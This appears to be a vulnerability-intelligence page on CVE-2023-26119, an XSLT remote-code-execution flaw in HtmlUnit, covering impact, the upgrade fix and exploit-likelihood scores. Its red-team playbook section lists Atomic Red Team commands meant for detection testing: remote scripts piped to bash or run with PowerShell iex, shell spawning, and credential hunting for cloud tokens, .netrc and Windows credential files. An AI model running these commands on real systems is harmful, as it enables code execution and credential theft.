CVE-2023-26119
Overview
The vulnerability is a remote code execution (RCE) flaw originating from unsafe processing of XSLT transformations within the HtmlUnit library. The root cause lies in the improper handling of XSLT inputs that allows execution of arbitrary code during XML stylesheet processing. This affects all versions of the net.sourceforge.htmlunit:htmlunit package up to, but not including, version 3.0.0, specifically in the component responsible for rendering and processing web content using XSLT.
Vulnerability Description
Versions of the package net.sourceforge.htmlunit:htmlunit from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage.
Impact
An unauthenticated attacker can remotely execute arbitrary code on a client system by luring a user to visit a specially crafted webpage containing malicious XSLT. This requires no user interaction beyond browsing, and no privileges are needed (AV:N/AC:L/PR:N/UI:N). The attacker gains full control over the affected system’s process, potentially leading to data theft, system compromise, or lateral movement within a network. The vulnerability’s critical severity (CVSS 9.8) reflects the high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Users of net.sourceforge.htmlunit:htmlunit should upgrade to version 3.0.0 or later, where the vulnerability has been addressed as per the official HtmlUnit GitHub commit 641325bbc84702dc9800ec7037aec061ce21956b. Detailed patch instructions and advisories are available at https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEHTMLUNIT-3252500. No official workarounds are documented; upgrading to the fixed release is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the HTMLUnit package, specifically in versions prior to 3.0.0, presents a critical risk due to its potential for Remote Code Execution (RCE) through XSLT processing. This vulnerability arises when an application utilizing HTMLUnit processes untrusted XML data, allowing an attacker to craft a malicious webpage that can exploit the XSLT capabilities of the library. By manipulating the XML data and leveraging the XSLT transformation features, an attacker can execute arbitrary code on the server or client-side, depending on how the HTMLUnit is implemented within the application. This flaw underscores the inherent risks associated with processing untrusted data without proper validation and sanitization.
Attack vectors exploiting this vulnerability are particularly insidious, as they can be initiated through seemingly innocuous means such as a web page visit. An attacker could host a malicious webpage designed to trigger the vulnerability when accessed by a user or an application that utilizes HTMLUnit for web scraping or testing. Once the vulnerable component processes the malicious XML, the attacker can execute arbitrary commands, potentially leading to full system compromise. This exploitation could occur in various scenarios, including automated testing environments, web applications that rely on HTMLUnit for rendering or interacting with web content, and even in continuous integration pipelines where automated tools might inadvertently process untrusted input.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on HTMLUnit in their development or production environments. The potential for RCE means that attackers could gain unauthorized access to sensitive data, manipulate application behavior, or even pivot to other systems within the network. The business risks associated with such an exploit include data breaches, loss of customer trust, regulatory penalties, and significant remediation costs. Additionally, the high CVSS score of 9.8 indicates that this vulnerability poses a critical threat, necessitating immediate attention from security teams to mitigate the associated risks.
Detection and mitigation strategies for this vulnerability should focus on both proactive and reactive measures. Organizations should first ensure that they are using the latest version of HTMLUnit, as upgrading to version 3.0.0 or later will eliminate the vulnerability. In addition to version control, implementing robust input validation and sanitization practices can significantly reduce the risk of exploitation. Security teams should also employ web application firewalls (WAFs) to monitor and filter incoming traffic for malicious payloads that may attempt to exploit this vulnerability. Regular security assessments, including penetration testing and code reviews, can help identify and remediate potential weaknesses in applications that utilize HTMLUnit.
In conclusion, the vulnerability within the HTMLUnit package represents a critical security concern due to its potential for remote code execution through XSLT processing. The ease of exploitation via crafted web pages poses significant risks to organizations, making it imperative to adopt comprehensive detection and mitigation strategies. By staying informed about vulnerabilities, maintaining updated software, and implementing best practices for input handling, organizations can protect themselves from the severe consequences associated with this and similar vulnerabilities.
Recent telemetry from CSURFACE threat intelligence indicates a modest increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-26119, rising by approximately 11.6% to 0.0403. Although this numerical shift remains within a low absolute range, it reflects a subtle uptick in the likelihood of exploitation attempts targeting the vulnerable Htmlunit package. Our sensors do not report any new exploit techniques or proof-of-concept releases, and the short-term trend shows a slight decline, suggesting that while interest in this vulnerability persists, it has not accelerated sharply. This nuanced change underscores the continued relevance of CVE-2023-26119 in the threat landscape, particularly given its critical severity and potential for remote code execution via crafted web content. Defenders should recognize that the vulnerability remains a viable attack vector, with exploitation risk marginally elevated but not yet indicative of widespread active campaigns. Consequently, the overall threat level is stable but warrants ongoing monitoring to detect any emergent exploitation patterns that could signal escalation.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Htmlunit | Htmlunit | All |
cpe:2.3:a:htmlunit:htmlunit:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-26119 |
| security.snyk.io |
GitHub CVE
|
https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEHTMLUNIT-3252500 |
| github.com |
GitHub CVE
|
https://github.com/HtmlUnit/htmlunit/commit/641325bbc84702dc9800ec7037aec061ce21956b |
| siebene.github.io |
GitHub CVE
|
https://siebene.github.io/2022/12/30/HtmlUnit-RCE/ |